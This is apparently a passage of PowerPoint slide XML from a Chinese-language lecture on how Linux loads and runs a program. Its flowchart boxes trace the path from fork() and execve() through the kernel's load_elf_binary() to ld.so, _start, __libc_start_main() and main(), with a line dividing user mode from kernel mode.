            <a:off x="6202900" y="5506533"/>
            <a:ext cx="2822000" cy="3840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search_binary_handler()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="669" name="Shape 669"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6574900" y="4675600"/>
            <a:ext cx="2078000" cy="3840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load_elf_binary()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="670" name="Shape 670"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6836300" y="3788467"/>
            <a:ext cx="1555200" cy="384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_start</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="671" name="Shape 671"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6836300" y="3016351"/>
            <a:ext cx="1555200" cy="384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main()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="672" name="Shape 672"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="663" idx="2"/>
            <a:endCxn id="665" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885567" y="2660600"/>
            <a:ext cx="0" cy="372000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="673" name="Shape 673"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="665" idx="2"/>
            <a:endCxn id="664" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885567" y="3416533"/>
            <a:ext cx="0" cy="372000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="674" name="Shape 674"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="664" idx="2"/>
            <a:endCxn id="666" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885567" y="4172467"/>
            <a:ext cx="0" cy="503200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="675" name="Shape 675"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="666" idx="2"/>
            <a:endCxn id="667" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885567" y="5059600"/>
            <a:ext cx="0" cy="446800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="676" name="Shape 676"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="667" idx="3"/>
            <a:endCxn id="668" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3924567" y="5698533"/>
            <a:ext cx="2278400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="677" name="Shape 677"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="668" idx="0"/>
            <a:endCxn id="669" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7613900" y="5059733"/>
            <a:ext cx="0" cy="446800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="678" name="Shape 678"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="669" idx="0"/>
            <a:endCxn id="670" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7613900" y="4172400"/>
            <a:ext cx="0" cy="503200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="679" name="Shape 679"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="670" idx="0"/>
            <a:endCxn id="671" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7613900" y="3400467"/>
            <a:ext cx="0" cy="388000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="680" name="Shape 680"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="590233" y="4403533"/>
            <a:ext cx="11017600" cy="9200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="lgDash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="681" name="Shape 681"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9534533" y="3788467"/>
            <a:ext cx="1555200" cy="3840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user mode</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="682" name="Shape 682"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9534533" y="4643800"/>
            <a:ext cx="1555200" cy="3840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kernel mode</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 662">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF641D7-71BE-4189-81FB-FA69D00BDFF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3924567" y="1351466"/>
            <a:ext cx="4064163" cy="57372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zh-CN" altLang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>静态链接的程序的执行过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="矩形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02F8ECE6-60F5-43B1-9694-EB1DA0BFFE30}"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>程序的装载与进程的执行</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9" name="Shape 689"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2107967" y="2276600"/>
            <a:ext cx="1555200" cy="384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 ./binary</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="690" name="Shape 690"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="903967" y="3788467"/>
            <a:ext cx="3963200" cy="384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execve("./binary", *argv[], *envp[])</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="691" name="Shape 691"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2107967" y="3032533"/>
            <a:ext cx="1555200" cy="384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fork()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="692" name="Shape 692"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1846567" y="4675600"/>
            <a:ext cx="2078000" cy="3840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sys_execve()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="693" name="Shape 693"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1846567" y="5506533"/>
            <a:ext cx="2078000" cy="3840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do_execve()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="694" name="Shape 694"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6202900" y="5506533"/>
            <a:ext cx="2822000" cy="3840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search_binary_handler()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="695" name="Shape 695"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6574900" y="4675600"/>
            <a:ext cx="2078000" cy="3840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load_elf_binary()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="696" name="Shape 696"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6847100" y="3032517"/>
            <a:ext cx="1555200" cy="384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_start</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="697" name="Shape 697"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6485500" y="2276600"/>
            <a:ext cx="2278400" cy="384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__libc_start_main()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="698" name="Shape 698"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="689" idx="2"/>
            <a:endCxn id="691" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885567" y="2660600"/>
            <a:ext cx="0" cy="372000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="699" name="Shape 699"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="691" idx="2"/>
            <a:endCxn id="690" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885567" y="3416533"/>
            <a:ext cx="0" cy="372000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="700" name="Shape 700"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="690" idx="2"/>
            <a:endCxn id="692" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885567" y="4172467"/>
            <a:ext cx="0" cy="503200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="701" name="Shape 701"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="692" idx="2"/>
            <a:endCxn id="693" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885567" y="5059600"/>
            <a:ext cx="0" cy="446800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="702" name="Shape 702"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="693" idx="3"/>
            <a:endCxn id="694" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3924567" y="5698533"/>
            <a:ext cx="2278400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="703" name="Shape 703"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="694" idx="0"/>
            <a:endCxn id="695" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7613900" y="5059733"/>
            <a:ext cx="0" cy="446800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="704" name="Shape 704"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="695" idx="0"/>
            <a:endCxn id="705" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="7613900" y="4172400"/>
            <a:ext cx="10800" cy="503200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="706" name="Shape 706"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="696" idx="0"/>
            <a:endCxn id="697" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7624700" y="2660517"/>
            <a:ext cx="0" cy="372000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="707" name="Shape 707"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="590233" y="4403533"/>
            <a:ext cx="11017600" cy="9200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="lgDash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="708" name="Shape 708"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9534533" y="3788467"/>
            <a:ext cx="1555200" cy="3840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user mode</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="709" name="Shape 709"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9534533" y="4643800"/>
            <a:ext cx="1555200" cy="3840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kernel mode</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="Shape 705"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6847100" y="3788451"/>
            <a:ext cx="1555200" cy="384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ld.so</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="710" name="Shape 710"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="705" idx="0"/>
            <a:endCxn id="696" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7624700" y="3416451"/>
            <a:ext cx="0" cy="372000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="711" name="Shape 711"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9534533" y="2276584"/>
            <a:ext cx="1555200" cy="384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_init</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="712" name="Shape 712"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9534533" y="3032517"/>
            <a:ext cx="1555200" cy="384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main()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
